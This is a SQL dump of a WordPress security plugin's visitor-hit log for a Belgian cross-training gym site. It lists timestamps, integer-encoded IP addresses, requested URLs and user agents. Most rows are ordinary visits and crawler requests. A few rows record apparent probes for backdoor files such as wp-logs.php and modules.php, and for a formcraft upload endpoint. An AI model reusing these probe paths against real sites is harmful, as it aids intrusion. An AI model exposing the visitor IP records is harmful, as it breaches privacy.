(72408, 1494560986.039078, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72409, 1494560995.521345, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72410, 1494561000.443419, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72411, 1494561005.910230, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72412, 1494561009.658116, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72413, 1494567310.770194, 1123638677, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.com/search', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36'),
(72414, 1494567310.893270, 1123638679, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.com/search', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36'),
(72415, 1494567586.928942, 632865533, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72416, 1494567587.589703, 632865533, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72417, 1494567588.092490, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72418, 1494567588.547960, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72419, 1494567588.993342, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72420, 1494567589.548573, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72421, 1494567590.141350, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72422, 1494567590.607366, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72423, 1494567591.081776, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72424, 1494567591.525082, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72425, 1494567591.952558, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(72426, 1494575289.048164, 632842500, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72427, 1494576813.610924, 2345094286, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'),
(72428, 1494577673.346209, 2995861269, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(72429, 1494577675.505409, 2995861269, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(72430, 1494577696.942599, 2995861269, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(72431, 1494579995.416245, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72432, 1494579998.407850, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72433, 1494579998.872631, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72434, 1494579999.314946, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72435, 1494579999.801192, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72436, 1494580000.218578, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72437, 1494580000.636216, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72438, 1494580001.512553, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72439, 1494580001.983810, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72440, 1494580002.388051, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72441, 1494580002.795665, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72442, 1494580003.327017, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72443, 1494580003.736140, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72444, 1494580004.133909, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72445, 1494580925.107442, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72446, 1494581761.601598, 3112277173, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-logs.php?action=test', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72447, 1494583365.679031, 1123631646, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72448, 1494583366.146187, 1123631646, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72449, 1494583369.927155, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72450, 1494585166.379784, 676177697, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72451, 1494585166.394578, 676177697, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72452, 1494587771.645913, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(72453, 1494587772.135109, 3652617247, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(72454, 1494591924.803893, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/formcraft/file-upload/server/php/', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(72455, 1494593490.144325, 2366145579, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(72456, 1494600382.990217, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/modules.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72457, 1494602619.401581, 3024883615, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72458, 1494606005.159250, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(72459, 1494606006.583754, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(72460, 1494606006.633431, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(72461, 1494606007.110949, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(72462, 1494611766.087721, 1123631816, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72463, 1494611767.168857, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72464, 1494611767.592937, 1123631630, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72465, 1494614206.596093, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72466, 1494614505.875136, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72467, 1494615413.002994, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72468, 1494615413.546301, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72469, 1494615413.980213, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72470, 1494615414.405002, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72471, 1494615414.909494, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72472, 1494615415.459743, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72473, 1494615416.147657, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72474, 1494615417.045286, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72475, 1494615417.549332, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72476, 1494615417.980478, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72477, 1494615418.494592, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72478, 1494628175.823785, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72479, 1494629387.420878, 1123634273, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72480, 1494642425.781889, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72481, 1494643397.820787, 3475901849, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72482, 1494643834.504506, 3475901809, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72483, 1494646397.984696, 1123634273, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72484, 1494647531.453429, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/style.css.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72485, 1494650843.136062, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72486, 1494652153.923071, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72487, 1494660353.270285, 1838104422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72488, 1494660353.799679, 1838104422, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72489, 1494660354.261200, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72490, 1494660354.725801, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72491, 1494660355.187490, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72492, 1494660355.690706, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72493, 1494660356.222207, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72494, 1494660356.650380, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72495, 1494660357.081570, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72496, 1494660357.530433, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72497, 1494660357.968063, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72498, 1494670074.460190, 1834541323, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(72499, 1494670090.744595, 1834541323, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(72500, 1494672066.689412, 3024883486, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72501, 1494674035.077304, 1607842043, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.'),
(72502, 1494674035.921482, 1607842043, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.'),
(72503, 1494674065.942369, 3024883477, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72504, 1494679493.051677, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72505, 1494679536.370166, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72506, 1494679799.833356, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72507, 1494683464.466176, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72508, 1494684600.527319, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72509, 1494685144.659180, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72510, 1494686292.336836, 2366148145, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(72511, 1494686292.350135, 2366145567, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(72512, 1494686296.669719, 1570674747, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(72513, 1494687629.258679, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72514, 1494700861.631042, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(72515, 1494700862.268071, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(72516, 1494703717.811153, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72517, 1494703718.387152, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72518, 1494703718.817380, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72519, 1494703719.311197, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72520, 1494703719.752451, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72521, 1494703720.265617, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72522, 1494703720.823817, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72523, 1494703721.364653, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72524, 1494703721.874278, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72525, 1494703722.372862, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72526, 1494703722.897697, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72527, 1494705888.516158, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72528, 1494705888.980964, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72529, 1494705889.433529, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72530, 1494705889.842302, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
